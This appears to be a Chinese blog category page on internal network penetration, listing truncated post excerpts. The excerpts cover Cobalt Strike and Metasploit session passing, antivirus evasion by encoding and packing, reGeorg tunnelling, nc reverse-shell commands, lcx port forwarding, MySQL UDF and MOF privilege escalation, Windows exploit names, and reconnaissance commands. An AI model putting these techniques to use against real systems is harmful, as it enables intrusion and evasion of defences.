随笔分类 - 内网渗透
摘要:今天年初六 MSF和cs联动 msf连接cs 1.在队伍服务器上启动cs服务端 ./teamserver 团队服务器ip 连接密码 2.cs客户端连接攻击机 填团队服务器ip和密码,名字随便 msf将session发往cs客户端 1.cs设置监听 监听器 add 选择payload类型和填攻击机ip
阅读全文
摘要:年初四 免杀 msfvenom encoder e 编码器 i 编码次数 多次编码 花指令 bad chars b '\x00' the backdoor factory upx 加壳 少用,基本能识别 .net壳 分离免杀 shellcode提取,动态加载
阅读全文
摘要:年初三 跨边界代理 reGeorg 1.python2 安装 urllib3 库 2.上传tunnel.nosocket.php代理脚本到目标机器web路径下 3.访问该文件确认能够执行 4.python2执行主程序reGeorgSocksProxy.py,连接代理脚本 python reGeorg
阅读全文
摘要:从我的思维导图笔记里导出来的,可能看起来不太直观,有时间再补点示例图 反弹shell /bin目录下带sh的都是shell nc 1.正向连接,目标机监听自身端口,攻击机主动建立连接 目标机:nc lvvp 端口 e /bin/bash ( e cmd.exe) 攻击机:nc vv 目标IP 监听端
阅读全文
摘要:跨边界转发 端口转发 lcx 流程 目标机 ./lcx slave 跳板机ip 监听的端口 127.0.0.1 要转发的端口 跳板机(公网) ./lcx listen 监听的端口 转发给攻击机访问的端口 攻击机 访问跳板机特定端口,即可访问到目标机特定端口 tran参数 如果某端口设置为不可访问,用
阅读全文
摘要:服务提权 mysql UDF提权 要求有写权限,并且未过滤单引号 windows UDF导出到系统目录 C:/WINDOWS/SYSTEM32/ MYSQL版本 5.1 linux /usr/lib/mysql/plugin MOF提权 只有windows 步骤 1.找个可写目录,将MOF文件上传
阅读全文
摘要:windows 系统漏洞,ms系列 ms08 067 ms09 012 pr.exe/巴西烤肉提权 ms09 020 iis5/6 ms12 020 rdp蓝屏 ms17 010 永恒之蓝/wannacry cve 2019 0708 rdp/命令执行 粘滞键提权(sethc.exe) 使用cmd.
阅读全文
摘要:linux 系统信息 grep MenTotal /proc/meminfo 查看系统内存总量 cat /etc/issue 查看系统名称 cat /etc/lsb release 查看系统名称、版本号 uname a 查看内核信息 ls /root | grep vmlinuz 查看内核信息 用户
阅读全文
摘要:windows 用户相关 query user 查看当前在线的用户 whoami 查看当前用户 net user 查看当前系统全部用户 net1 user 查看当前系统全部用户(高权限命令) net user /domain 查看当前域全部用户 net user administrator 查看ad
阅读全文
浙公网安备 33010602011771号